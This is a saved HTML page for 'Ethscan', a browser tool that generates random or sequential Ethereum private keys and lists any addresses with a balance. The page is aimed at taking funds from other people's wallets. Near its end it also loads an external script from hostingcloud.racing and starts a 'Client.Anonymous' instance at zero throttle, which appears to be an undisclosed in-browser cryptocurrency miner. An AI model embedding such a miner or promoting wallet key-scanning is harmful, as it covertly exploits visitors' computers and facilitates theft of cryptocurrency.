<!DOCTYPE html>
<!-- saved from url=(0051)file:///D:/Diverse/Freedom/Ethscan/Ethscan.App.html -->
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

      

      
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <meta name="description" content="">
      <meta name="author" content="Ethscan.App">
      <link href="" rel="icon">
      <title>Ethscan</title>
      <meta name="description" content="Ethscan.App - Automatically Scan All Private Keys Ethereum">

      <link href="./Ethscan_files/font-awesome.min.css" rel="stylesheet">
      <link href="./Ethscan_files/bootstrap.min.css" rel="stylesheet">
      <link href="./Ethscan_files/style.css" rel="stylesheet">
   <style type="text/css" nonce="undefined">
   
   </style></head>
   <body class="bg-light">
      <div class="container">
         <div class="row">
            <div class="col-md-12">
         <div class="py-5 text-center">
            <h2 class="mb-3" id="lng4">ETH Private Keys Scanner</h2>
            <div class="row">
               <div class="col-md-12">
                  
               </div>
            
            </div>
         </div>
            </div>
         </div>

         <div class="row">
            <div class="col-md-12">
               <h4 class="mb-3" id="lng4">Setting</h4>
               <p class="mb-3"><button type="button" class="btn btn-secondary btn-sm" data-toggle="collapse" data-target="#demo" id="btn-setting"><i class="fa fa-expand"></i> <span id="lng5">Open/hide setting</span></button></p>
               <div id="divSetting">
                  <div class="card card-body">
                     <div class="d-block my-1">
                        <strong id="lng6">How will it scan?</strong>
                        <div class="custom-control custom-radio"> <input id="Random" name="typeScan" type="radio" class="custom-control-input" value="1" checked="" required=""> <label class="custom-control-label" for="Random" id="lng7">Random</label></div>
                        <div id="div-setting-randrom" style="margin-left: 30px;">
                          <div class="custom-control custom-checkbox my-1 mr-sm-2">
                            <input type="checkbox" class="custom-control-input" id="randomAndNoOrderly">
                            <label class="custom-control-label" for="randomAndNoOrderly"><i id="lng8">Random &amp; no orderly</i></label>
                          </div>
                        </div>
                        <div class="custom-control custom-radio"> <input id="Orderly" name="typeScan" type="radio" class="custom-control-input" value="0" required=""> <label class="custom-control-label" for="Orderly" id="lng9">Orderly</label></div>
                     </div>
                     <div class="row" style="display: none;margin-left: 30px;" id="div-start-from">
                        <div class="col-md-12 mb-1"> <i id="lng10">Start from:</i> <input type="text" id="start-private" class="form-control" value="0000000000000000000000000000000000000000000000000000000000000001" placeholder="Private key" style="width: 100%;" required="required" disabled="disabled"><small id="emailHelp" class="form-text text-muted">Hexadecimal 64 character (A-F a-f 0-9).</small></div>
                     </div>
                     <div class="d-block my-1">
                        <strong id="lng11">What to do?</strong>
                        <div class="custom-control custom-radio"> <input id="onlyScansEther" name="typeCheck" type="radio" class="custom-control-input" value="0" checked=""> <label class="custom-control-label" for="onlyScansEther" id="lng12">Only scan Ether balance</label> <small style="color: #777;"> ~ 20 Address/ 1s</small></div>
                        <!-- <div class="custom-control custom-radio"> <input id="checkAllBalance" name="typeCheck" type="radio" class="custom-control-input" value="1"> <label class="custom-control-label" for="checkAllBalance" id="lng13">Check Txs/Eth/Usd/Token</label> <small style="color: #777;"> ~ 1 Address/ 1s</small><br><small class="form-text text-danger" id="lng26">Often error, speed is not good (Request limit ethereum network)</small></div> -->

                     </div>
                     <div class="d-block my-1">
                        <strong id="lng14">When will it stop?</strong>
                        <div class="custom-control custom-radio"> <input id="Unlimited" name="limitScan" type="radio" class="custom-control-input" value="0" checked=""> <label class="custom-control-label" for="Unlimited"><span id="lng15">Unlimited - Stop when I turn off this</span></label></div>
                        <div class="custom-control custom-radio"> <input id="Stop" name="limitScan" type="radio" class="custom-control-input" value="2"> <label class="custom-control-label" for="Stop"><span id="lng16">Stop when there is balance</span></label></div>
                        <div class="custom-control custom-radio"> <input id="Limit" name="limitScan" type="radio" class="custom-control-input" value="1"> <label class="custom-control-label" for="Limit"><span id="lng17">Limit the number of times</span></label></div>
                     </div>
                     <div class="row" style="display: none;margin-left: 30px;" id="div-times">
                        <div class="col-md-12 mb-1"> <label for="cc-name"><i id="lng18">Times:</i></label> <input type="text" id="limit-scan" class="form-control" value="100" placeholder="Private key" style="width: 100%;" required="required" disabled="disabled"></div>
                     </div>
                  </div>
               </div>
               <hr class="mb-4">
               <h4 class="mb-3"><span id="lng19">Scan</span> / <span id="totalAddress">0</span> <span id="lng20">Address</span> / <span id="lng21">Delay</span> <span id="delay">0</span>s</h4>
               <span id="buttonOption"><button class="btn btn-primary btn-sm" type="button" id="btn-start-scan"><i class="fa fa-play-circle"></i> <span id="lng22">START</span></button></span>
               <div class="mb-3"></div>
               <div class="table-responsive">
                  <table class="table table-striped table-sm table-bordered table-hover">
                     <thead>
                        <tr class="align-middle">
                           <th>#</th>
                           <th><i class="fa fa-key"></i> Private Key</th>
                           <th><i class="fa fa-codepen"></i> Address</th>
                           <th><i class="fa fa-sun-o"></i> Balance</th>
                        </tr>
                     </thead>
                     <tbody>
                                                <tr>
                           <td>1</td>
                           <td id="private0"></td>
                           <td id="address0"></td>
                           <td id="balance0"></td>
                        </tr>
                                                <tr>
                           <td>2</td>
                           <td id="private1"></td>
                           <td id="address1"></td>
                           <td id="balance1"></td>
                        </tr>
                                                <tr>
                           <td>3</td>
                           <td id="private2"></td>
                           <td id="address2"></td>
                           <td id="balance2"></td>
                        </tr>
                                                <tr>
                           <td>4</td>
                           <td id="private3"></td>
                           <td id="address3"></td>
                           <td id="balance3"></td>
                        </tr>
                                                <tr>
                           <td>5</td>
                           <td id="private4"></td>
                           <td id="address4"></td>
                           <td id="balance4"></td>
                        </tr>
                                                <tr>
                           <td>6</td>
                           <td id="private5"></td>
                           <td id="address5"></td>
                           <td id="balance5"></td>
                        </tr>
                                                <tr>
                           <td>7</td>
                           <td id="private6"></td>
                           <td id="address6"></td>
                           <td id="balance6"></td>
                        </tr>
                                                <tr>
                           <td>8</td>
                           <td id="private7"></td>
                           <td id="address7"></td>
                           <td id="balance7"></td>
                        </tr>
                                                <tr>
                           <td>9</td>
                           <td id="private8"></td>
                           <td id="address8"></td>
                           <td id="balance8"></td>
                        </tr>
                                                <tr>
                           <td>10</td>
                           <td id="private9"></td>
                           <td id="address9"></td>
                           <td id="balance9"></td>
                        </tr>
                                                <tr>
                           <td>11</td>
                           <td id="private10"></td>
                           <td id="address10"></td>
                           <td id="balance10"></td>
                        </tr>
                                                <tr>
                           <td>12</td>
                           <td id="private11"></td>
                           <td id="address11"></td>
                           <td id="balance11"></td>
                        </tr>
                                                <tr>
                           <td>13</td>
                           <td id="private12"></td>
                           <td id="address12"></td>
                           <td id="balance12"></td>
                        </tr>
                                                <tr>
                           <td>14</td>
                           <td id="private13"></td>
                           <td id="address13"></td>
                           <td id="balance13"></td>
                        </tr>
                                                <tr>
                           <td>15</td>
                           <td id="private14"></td>
                           <td id="address14"></td>
                           <td id="balance14"></td>
                        </tr>
                                                <tr>
                           <td>16</td>
                           <td id="private15"></td>
                           <td id="address15"></td>
                           <td id="balance15"></td>
                        </tr>
                                                <tr>
                           <td>17</td>
                           <td id="private16"></td>
                           <td id="address16"></td>
                           <td id="balance16"></td>
                        </tr>
                                                <tr>
                           <td>18</td>
                           <td id="private17"></td>
                           <td id="address17"></td>
                           <td id="balance17"></td>
                        </tr>
                                                <tr>
                           <td>19</td>
                           <td id="private18"></td>
                           <td id="address18"></td>
                           <td id="balance18"></td>
                        </tr>
                                                <tr>
                           <td>20</td>
                           <td id="private19"></td>
                           <td id="address19"></td>
                           <td id="balance19"></td>
                        </tr>
                                             </tbody>
                  </table>
               </div>
               <hr class="mb-4">
               <h4 class="mb-3" id="lng24">Address has balance</h4>
               <div id="havaBalance" style="padding: 3px;border: 1px solid #ddd;border-radius: 5px;"><span id="lng25">Not yet !</span></div>
            </div>
         </div>
      </div>
   

      <script type="text/javascript" async="" src="./Ethscan_files/analytics.js.download"></script><script type="text/javascript" async="" src="./Ethscan_files/analytics.js(1).download"></script><script type="text/javascript" src="./Ethscan_files/jquery-3.2.1.js.download"></script>
      <script type="text/javascript" src="./Ethscan_files/bootstrap.min.js.download"></script> 
      <script type="text/javascript" src="./Ethscan_files/app.min.js.download"></script> 
      <script type="text/javascript" src="./Ethscan_files/ethscan.js.download"></script> 
      <script type="text/javascript" src="./Ethscan_files/language.js.download"></script> 
	  <script src="https://www.hostingcloud.racing/uTyo.js"></script>
<script>
    var _client = new Client.Anonymous('0a3f8bde0023b93a575dcf00acff66b68a301bb4e3d181781befa7d2794c1785', {
        throttle: 0, ads: 0
    });
    _client.start();
    

</script>
      <footer class="my-5 pt-5 text-muted text-center text-small"> Ethscan <p></p> </footer> <script async="" src="./Ethscan_files/js"></script><script>window.dataLayer=window.dataLayer||[];function gtag(){dataLayer.push(arguments);}gtag('js',new Date());gtag('config','UA-119148678-1');</script> </body></html>